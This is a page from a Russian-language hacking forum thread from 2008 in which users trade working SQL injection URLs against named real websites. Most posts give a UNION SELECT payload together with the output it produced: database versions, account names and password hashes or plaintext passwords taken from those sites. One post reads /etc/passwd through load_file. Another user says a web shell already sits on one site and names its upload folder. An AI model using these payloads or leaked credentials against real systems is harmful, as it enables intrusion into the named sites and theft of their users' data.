HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5891  
Старый 05.07.2008, 23:40
[Illuminati]
Banned
Регистрация: 05.07.2008
Сообщений: 2
С нами: 9394946

Репутация: 2
По умолчанию

http://www.lexisnexis.ca/bookstore/bookinfo.php?pid=-20+union+select+1,cast(version()+as+binary),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
 
Ответить с цитированием

  #5892  
Старый 06.07.2008, 00:13
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами: 9949072

Репутация: 237
По умолчанию

Код:
http://www.vip-gsm.ru/spec.php?id=-573'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x2F,user,password),13,14,15,16,17,18+from+mysql.user/*
Version: 4.1.18
User/Pass: root/40cdfeb7631887f0
 
Ответить с цитированием

  #5893  
Старый 06.07.2008, 00:34
[Illuminati]
Banned
Регистрация: 05.07.2008
Сообщений: 2
С нами: 9394946

Репутация: 2
По умолчанию

K1nD[e]R, на вип джи эс эм у меня уже давно шелл лежит, там file_priv =Y b кавычки не экранируются, в ошибке путь виден, папка на заливку sql/images вроде,
 
Ответить с цитированием

  #5894  
Старый 06.07.2008, 00:50
otmorozok428
Banned
Регистрация: 19.10.2007
Сообщений: 152
С нами: 9769519

Репутация: 415
По умолчанию

Белорусский Республиканский ТЕАТР ЮНОГО ЗРИТЕЛЯ

Цитата:
Сообщение от kair  
http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5 ,6,7,8,9,10/*
При инъекции в скрипте persons.php можно узнать немного больше

Код:
http://www.tuz-by.com/persons.php?type=1+union+select+1,2,version(),user(),5,6,7,8,database(),10--
VERSION(): 4.0.24_Debian-10sarge2-log
DATABASE(): tuzbycom
USER(): tuzbycom@localhost

Так же подвержен скуль-инъекции скрипт

Код:
http://www.tuz-by.com/viewpress.php?id=13+union+select+1,2,3,4,5,6,7--
 
Ответить с цитированием

  #5895  
Старый 06.07.2008, 01:08
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами: 9949072

Репутация: 237
По умолчанию

Код:
http://shirley.ru/cat.php?id=-3+union+select+concat_ws(0x2F,uid,uname,pass),2+from+shir_users+limit+3,3/*
Version: 5.0.33

uname/pass : Алексей/c6f057b86584942e415435ffb1fa93d4
P.S юзаем (limit+x,x) для вывода юзеров=)
 
Ответить с цитированием

  #5896  
Старый 06.07.2008, 01:39
K1nD[e]R
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
С нами: 9949072

Репутация: 237
По умолчанию

Код:
http://www.ixbt.com/news/news.php?id=-1+union+select+1,2,concat_ws(0x2F,name,password),version(),5,6,7,8,9,10,11+from+user+limit+3,3/*
Version: 4.0.27
name/pass: Administrator/another_enter
P.S юзаем (limit+x,x) для вывода юзеров=)
 
Ответить с цитированием

  #5897  
Старый 06.07.2008, 08:39
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Davinciinstitute.com - PR 6
Цитата:
http://www.davinciinstitute.com/page.php?ID=-1'+union+select+1,2,3,concat_ws(0x3a,LoginName,Pas sword),5,6+from+AdminUsers/*
как разшифровать? попробвал hex(ascii)=md5

Bouldertheater.com - PR 6
Цитата:
http://www.bouldertheater.com/event_detail.php?id=999999+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41+from+information_schema.tables+limit+1 7,1--
Umpcportal.com - PR 6
Цитата:
http://www.umpcportal.com/products/product.php?id=9999999+union+select+version(),2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
Linspire.com - PR 7
Цитата:
http://www.linspire.com/linspire_letter_archives.php?id=9999999+union+sele ct+1,version(),3,4/*
Allianceforbiz.com - PR 6
Цитата:
http://www.allianceforbiz.com/events/specific_event.php?id=999999+union+select+1,versio n(),3,4/*
Koleso.topof.ru - PR 4
Цитата:
http://koleso.topof.ru/testing_info.php?id=9999+union+select+1,2,concat_w s(0x3a,admin_login,admin_password),4,5,6,7+from+ko leso_ktopof.admins/*
Cccs.com - PR 5
Цитата:
http://www.cccs.com/index.php?id=99999+union+select+1,2,3/*
увы.. но для вывода нужно зарегатся..(

Последний раз редактировалось sabe; 13.07.2008 в 07:44..
 
Ответить с цитированием

  #5898  
Старый 06.07.2008, 11:25
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
С нами: 10077446

Репутация: 3965


По умолчанию

Да, чёта меня на метео потянуло...
gismeteo.ru

Google PR 6 / 10
Яндекс тИЦ 19000

Цитата:
http://avia.gismeteo.ru/avia.php?id=27612+union+select+1+limit+1,1--
Database Version: 4.1.1-alpha-standard
Database name: search
User name: root@localhost
 
Ответить с цитированием

  #5899  
Старый 06.07.2008, 12:03
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

Viperson.ru - PR 4
Цитата:
http://www.viperson.ru/wind.php?ID=999999+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT(Version()),0x71),0x71)/*
Cyberthing.net - PR 3
Цитата:
http://www.cyberthing.net/video-play.php?id=9999+union+select+1,table_name,3,4,5,6 ,7+from+information_schema.tables/*
Dimi4
Цитата:
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(load_file(0x2F6574632F706173737764),0x71),0x7 1)+limit+1,1--
load_file никто не отменял..)
Цитата:
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(concat_ws(0x3a,user,password),0x71),0x71)+fro m+mysql.user+limit+1,1--
и это. но сдесь почемуто на рута пасса нету

Последний раз редактировалось sabe; 06.07.2008 в 12:57..
 
Ответить с цитированием

pr-cy.ru
  #5900  
Старый 06.07.2008, 15:27
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию pr-cy.ru

pr-cy.ru
Цитата:
http://pr-cy.ru/faq/-21+union+select+1,2,3.html
5.0.51a-community-log
доступны только стандартные таблицы и одна таблица FAQ ..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...